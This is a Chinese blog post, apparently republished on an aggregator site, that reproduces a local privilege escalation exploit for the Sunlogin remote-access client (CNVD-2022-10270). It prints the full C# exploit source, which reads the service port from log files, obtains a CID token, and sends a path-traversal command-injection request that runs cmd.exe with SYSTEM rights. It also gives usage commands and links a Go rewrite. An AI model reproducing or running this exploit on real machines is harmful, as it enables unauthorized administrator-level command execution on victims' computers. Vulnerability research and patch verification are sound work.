根據(jù)玄武實驗室的文章

https://github.com/Ryze-T/CNVD-2022-10270-LPE

找到目標(biāo)日志文件

cd /d c:/ dir /S sunlogin_service*

向日葵日志文件

sunlogin_service.20220226-171345.log

復(fù)現(xiàn)

安裝.NET 4

https://www.microsoft.com/zh-cn/download/details.aspx?id=17718

在運行，發(fā)現(xiàn)需要指定路徑路徑，而我在win7下目錄為

C:\ProgramData\Oray\SunloginClient\log

和默認(rèn)不同所以需要自己指定（注意這里不帶log）

sunloginLPE.exe whoami C:\ProgramData\Oray\SunloginClient

代碼分析

using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Text.RegularExpressions; using System.Net;namespace sunloginLPE {internal class Program{static string GetLatestFiles(string Path, int count){var query = (from f in Directory.GetFiles(Path)let fi = new FileInfo(f)orderby fi.CreationTime descendingselect fi.FullName).Take(count);string[] files = query.ToArray();for (int i = 0; i < files.Length; i++){if (files[i].Contains("sunlogin_service.")){return files[i];}}Console.WriteLine("[-] logFile not found");return "";}static string getPort(string path){string logFile = GetLatestFiles(path + "\\log", 2);string port = "";string s;if (logFile != ""){FileStream fs = new FileStream(logFile, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);StreamReader sr = new StreamReader(fs, System.Text.Encoding.Default);s = sr.ReadToEnd();string pattern = @"\bstart listen OK\S*\,";string pattern2 = @"\d{5}";string res = "";MatchCollection mc = Regex.Matches(s, pattern);foreach (Match m in mc)res = m.Value;MatchCollection mc2 = Regex.Matches(res, pattern2);foreach (Match m2 in mc2)port = m2.Value;}return port;}private static String HttpGet(string url, string requestData){// 實例化請求對象HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);request.Method = "GET";request.ContentType = "text/html; charset=UTF-8";// 實例化響應(yīng)對象，獲取響應(yīng)信息HttpWebResponse response = (HttpWebResponse)request.GetResponse();Stream responseStream = response.GetResponseStream();StreamReader sReader = new StreamReader(responseStream, Encoding.Default);String result = sReader.ReadToEnd();sReader.Close();responseStream.Close();return result;}private static String HttpGetWithCookie(string url, string requestData,string cookie){// 實例化請求對象HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);request.Method = "GET";request.ContentType = "text/html; charset=UTF-8";request.Headers.Add("Cookie", "CID=" + cookie);// 實例化響應(yīng)對象，獲取響應(yīng)信息HttpWebResponse response = (HttpWebResponse)request.GetResponse();Stream responseStream = response.GetResponseStream();StreamReader sReader = new StreamReader(responseStream, Encoding.Default);String result = sReader.ReadToEnd();sReader.Close();responseStream.Close();return result;}static string exp(string SunloginClient_port,string ExecCmd){String targetUrl = "http://127.0.0.1:" + SunloginClient_port + "/cgi-bin/rpc";String response = HttpGet(targetUrl, "action=verify-haras");string pattern = "verify_string\":\"(\\w+)?\"";string cid = "";MatchCollection mc = Regex.Matches(response, pattern);foreach (Match m in mc)cid = m.Value;cid = cid.Replace("\"", "").Replace("verify_string:", "");Console.WriteLine("[+] CID=" +cid);targetUrl = "http://127.0.0.1:" + SunloginClient_port + "/check";response = HttpGetWithCookie(targetUrl, "cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows\\system32\\cmd.exe+/c+" + ExecCmd.Replace(" ","+"),cid);return response;}static void Main(string[] args){Console.WriteLine("[!] Usage: sunloginLPE.exe Cmd [sunloginClientPath]（DefaultPath = C:\\Program Files\\Oray\\SunLogin\\SunloginClient）");string defaultPath = "C:\\Program Files\\Oray\\SunLogin\\SunloginClient";string cmd = "";string path = defaultPath;string port = "";if(args.Length == 1){cmd = args[0];}else if(args.Length == 2){cmd=args[0];path =args[1];}else{Console.WriteLine("[-] wrong number of parameters");System.Environment.Exit(0);}try{port = getPort(path);if(port != ""){Console.WriteLine("[+] SunloginClient port is " + port);}else{Console.WriteLine("[-] SunloginClient port not found");System.Environment.Exit(0);}Console.WriteLine("[+] 命令執(zhí)行結(jié)果: \n" + exp(port, cmd));}catch(Exception ex){Console.WriteLine("[-] " + ex.ToString());}}} }

在111行Main函數(shù)中寫死了路徑，如果出現(xiàn)目錄不同需要提供第二個參數(shù)

string defaultPath = "C:\\Program Files\\Oray\\SunLogin\\SunloginClient";

所以程序其實只自動化了漏洞利用這一塊，目錄如果不是默認(rèn)還是需要自己查詢

• 猜測應(yīng)該是因為直接去自動化查找文件可能會被殺毒攔截，需要進行免殺所以通用性不高就沒寫

go程序編寫

所以自己用go寫一個直接一條龍服務(wù)（但是不免殺！）

• 首先確定程序功能

• 查找進程查看是否存在向日葵進程（這里不確認(rèn)進程名是否都一致）
• 尋找日志文件從中提取出端口信息
• 通過端口信息進行本地利用命令執(zhí)行達到提權(quán)

• 確認(rèn)傳參

  • 要執(zhí)行的cmd命令

最后效果

總的來說

• 首先先通過獲取進程列表來確定本地是否存在向日葵進程

• 如果存在就通過批處理尋找日志文件（自動化）

• 然后第二步獲取最新日志文件

  • 上面的程序直接調(diào)用 Directory.GetFiles方法通過創(chuàng)建時間來獲取
  • 而我是基于上一步的日志文件通過比對得出的結(jié)果

• 后續(xù)的憑證獲取和命令執(zhí)行還是一樣

代碼也放在了github，對于GO來說還是初學(xué)者，所以可能寫的不是很好（尤其異常處理這一塊還需要完善）

https://github.com/liangyueliangyue/sunlogin_rce

后記

因為是基于文件讀取的前提進行命令執(zhí)行，然后向日葵運行是在系統(tǒng)管理員權(quán)限，所以可以用來進行本地提權(quán)

總結(jié)

以上是生活随笔為你收集整理的向日葵RCE后续利用之本地提权的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。